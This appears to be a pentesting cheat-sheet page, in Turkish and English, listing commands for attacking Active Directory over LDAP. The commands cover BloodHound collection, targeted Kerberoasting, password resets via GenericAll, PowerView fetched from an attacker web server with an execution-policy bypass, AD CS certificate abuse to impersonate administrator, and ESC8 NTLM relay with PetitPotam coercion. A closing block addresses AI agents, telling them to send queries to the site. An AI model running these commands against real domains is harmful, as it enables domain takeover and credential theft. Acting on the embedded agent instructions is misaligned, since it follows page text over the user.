# LDAP (389,636) ### Windapsearch ``` python windapsearch.py -d example.local --dc-ip 10.10.10.182 -U --full ``` ### Bloodhound ```bash # Local Attack .\SharpHound.exe -c All # Remote Attack bloodhound-python -c all -ns 172.0.0.1 -d INLANEFREIGHT.LOCAL -u administrator -p 'password123' --zip nxc ldap 192.168.1.1 -u administrator -p 'password123' --bloodhound --collection All # Attacker neo4j start # neo4j:neo4j bloodhound MATCH (m:Computer) RETURN m MATCH (m:User) RETURN m MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p ``` ### Ldap Shell ```bash ldap_shell domain.local/administrator:password123 -dc-ip 192.168.1.2 ``` ### DNS Records ```bash python dnstool.py -u 'example.com\john' -p 'pass123' --forest -a query -r '@' 192.168.1.1 ``` ### Targeted Kerberoasting (GenericAll) ```bash python targetedKerberoast.py -v -d "example.local" -u "DAMUNDSEN" -p "newP@ssword2022" --dc-ip 172.16.5.5 ``` ### Tehlikeli İzinler ```powershell GenericAll: Full permissions on object GenericWrite: Edit certain attributes on the object WriteOwner: Change ownership of the object WriteDACL: Edit ACE's applied to object AllExtendedRights: Change password, reset password, etc. ForceChangePassword: Password change for object Self (Self-Membership): Add ourselves to for example a group CanPSRemote : Winrm izin verir CanRDP : RDP yapabilir # GenericAll (Full Access) net user john Password123 /domain net group "Management Department" john /add /domain runas /user:domain.local\john "cmd.exe" ``` ### Powerview ```powershell cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 . python -m http.server 80 iwr -uri http://192.168.1.2/PowerView.ps1 -Outfile PowerView.ps1 powershell -ep bypass Import-Module .\PowerView.ps1 Get-NetDomain # Domain Bilgisi Get-NetUser # Bütün Kullanıcılar Get-NetUser -SPN | select samaccountname,serviceprincipalname # SPN Get-NetUser | select cn # Sadece cn Özelliği Get-NetGroup # Bütün Gruplar Get-NetComputer # Computer Objects Find-LocalAdminAccess # Domaindeki Bilgisayarda Admin Yetkimiz Varmı Get-NetSession -ComputerName client74 # Session Kontrolü Get-ObjectAcl -Identity stephanie # ACE Listeleme Find-DomainShare # Share listeleme Find-DomainShare -CheckShareAccess # Açılan Sharelar ``` ### AD CS Zafiyetleri Certify.exe: ```bash ./Certify.exe cas ./Certify.exe find /vulnerable certipy-ad find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -vulnerable certipy-ad req -u john.doe@example.local -p password123 -upn administrator@example.local -target example.local -ca example-dc-ca -template UserAuthentication certipy-ad auth -pfx administrator.pfx timedatectl set-ntp off ntpdate dc.sequel.htb certipy-ad auth -pfx administrator.pfx ``` ### ESC8 ```bash # Relay impacket-ntlmrelayx -t http://dc.corp.com/certsrv/certfnsh.asp -domain corp.com -smb2support --adcs --template DomainController # Petitpotam nxc smb 192.168.1.1 -u john -p 'pass123' -d corp.com -M coerce_plus -o LISTENER=192.168.1.2 # Get Ticket python PKINITtools/gettgtpkinit.py corp.com/DC$ -cert-pfx DC.pfx dc.ccache # Import Ticket export KRB5CCNAME=dc.ccache # Use Ticket nxc smb 192.168.1.1 -u 'DC$' --use-kcache ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yigitsengezer.gitbook.io/siber-guvenlik-notlari/network-service-pentesting/active-directory-services/ldap-389-636.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.